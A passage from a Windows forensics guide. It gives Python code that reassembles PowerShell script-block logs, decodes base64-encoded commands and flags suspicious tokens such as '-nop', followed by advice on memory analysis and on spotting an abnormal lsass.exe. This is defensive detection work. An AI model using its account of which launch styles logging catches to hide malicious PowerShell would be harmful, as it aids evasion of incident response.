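            decoded.append(base64.b64decode(m.group(2), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def triage_script_blocks(fragments):
    """Return (ScriptBlockId, hits, decoded_payloads, missing) for blocks worth
    reading: suspicious tokens found after reassembly and decoding, or gaps."""
    results = []
    for sbid, block in reassemble_script_blocks(fragments).items():
        decoded = decode_encoded_commands(block["text"])
        corpus = (block["text"] + "\n" + "\n".join(decoded)).lower()
        hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in corpus]
        if hits or block["missing"]:
            results.append((sbid, hits, decoded, block["missing"]))
    return results


if __name__ == "__main__":
    for sbid, hits, decoded, missing in triage_script_blocks(SAMPLE_4104):
        print(sbid, hits, decoded, f"missing fragments: {missing}")
```

Decoding before matching is what makes the encoded launch in b2 visible; matching tokens against the raw ScriptBlockText alone would only catch -nop. The "missing" list matters because a partial block can hide the part that downloads or executes something.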

Comprehensive Artifact Investigation and Forensic Recommendations

  1. Memory Analysis: Memory analysis can uncover additional artifacts like command history and executable evidence. Dumping memory from processes like conhost.exe and searching for relevant strings can help recover command-line arguments and artifacts.

  2. Deep-Dive Analysis: Techniques like file carving, volume shadow copy analysis, and NTFS log analysis can help recover deleted files and logs tampered with by attackers.

  3. Process Monitoring: Knowing what normal looks like (parent process, image path, user, instance count) for core processes such as explorer.exe, lsass.exe and services.exe lets anomalies stand out. lsass.exe, for example, should run once, from System32, as SYSTEM, with wininit.exe as its parent; a second lsass.exe or one launched from a user directory is a finding. Sysinternals Process Explorer and Autoruns (with their VirusTotal integration, which checks file hashes against VirusTotal) help surface such deviations.


By combining these tools, methods, and Event IDs, forensic investigators and incident responders can effectively analyze and interpret data from a variety of Windows artifacts, providing a detailed understanding of lateral movement and malicious activities in the system.
